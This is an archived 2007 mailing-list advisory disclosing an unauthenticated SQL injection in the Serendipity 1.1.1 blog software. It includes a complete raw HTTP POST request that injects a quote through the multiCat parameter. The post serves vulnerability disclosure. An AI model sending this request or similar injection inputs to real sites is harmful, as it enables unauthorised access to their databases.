WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

Serendipity unauthenticated SQL-Injection

From: SaMuschie <samuschie () yahoo de>
Date: Thu, 1 Mar 2007 17:55:13 +0100 (CET)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+--------------------------------------- -  -- -
| SaMuschie Research Labs proudly presents . . .
+-------------------------------------------  -- -  -  
| Application: serendipity
| Version: 1.1.1 (others not testet)
| Vuln./Exploit Type: SQL-Injection
| Status: 0day
+----------------------------------------- --  -  -  
| Discovered by: Samenspender
| Released: 20070301
| SaMuschie Release Number: 4
+------------------------------- -  -- -

POST /serendipity/index.php?frontpage HTTP/1.0
User-Agent: Mozilla/5.0 (SaMuschie)
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 67 
Connection: close

serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21

+-----------------------------  -- -
| Lameness Disclaimer
+------------------------------------- - -- -  -  
| SaMuschie Research Labs was found to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
| 
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of 
| this advisory are requested not to ask any questions
| to the researchers.... they don't know the answer ;) 
+----------------------------------  - --  - -
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF5tLFMFgfGpQK8VERAgphAJ4qvuCfLYTWO6pluhlm92gSlZz5AQCeINsc
rYF05IF5Rztw2+FzaqhUyA4=
=sQNU
-----END PGP SIGNATURE-----




        
                
___________________________________________________________ 
Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de

-------------------------------------------------------------------------
Sponsored by: Watchfire

The Twelve Most Common Application-level Hack Attacks
Hackers continue to add billions to the cost of doing business online 
despite security executives' efforts to prevent malicious attacks. This 
whitepaper identifies the most common methods of attacks that we have seen, 
and outlines a guideline for developing secure web applications. 
Download today!

https://www.watchfire.com/securearea/whitepapers.aspx?id=701500000008fHe
--------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: